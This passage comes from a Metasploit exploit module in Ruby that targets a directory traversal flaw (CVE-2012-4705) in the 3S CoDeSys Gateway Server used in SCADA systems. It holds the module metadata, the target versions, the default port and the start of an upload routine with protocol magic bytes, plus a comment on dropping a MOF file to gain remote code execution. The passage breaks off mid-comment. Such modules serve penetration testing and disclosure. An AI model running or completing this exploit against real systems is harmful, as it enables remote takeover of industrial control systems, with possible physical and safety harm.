## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Exploit::Remote::Tcp include Msf::Exploit::WbemExec def initialize(info = {}) super(update_info(info, 'Name' => 'SCADA 3S CoDeSys Gateway Server Directory Traversal', 'Description' => %q{ This module exploits a directory traversal vulnerability that allows arbitrary file creation, which can be used to execute a mof file in order to gain remote execution within the SCADA system. }, 'Author' => [ 'Enrique Sanchez ' ], 'License' => 'MSF_LICENSE', 'References' => [ ['CVE', '2012-4705'], ['OSVDB', '90368'], ['URL', 'http://ics-cert.us-cert.gov/pdf/ICSA-13-050-01-a.pdf'] ], 'DisclosureDate' => 'Feb 02 2013', 'Platform' => 'win', 'Targets' => [ ['Windows Universal S3 CoDeSyS < 2.3.9.27', { }] ], 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(1211), ], self.class) end ## # upload_file(remote_filepath, remote_filename, local_filedata) # # remote_filepath: Remote filepath where the file will be uploaded # remote_filename: Remote name of the file to be executed ie. boot.ini # local_file: File containing the read data for the local file to be uploaded, actual open/read/close done in exploit() def upload_file(remote_filepath, remote_filename, local_filedata = null) magic_code = "\xdd\xdd" opcode = [6].pack('L') # We create the filepath for the upload, for execution it should be \windows\system32\wbem\mof\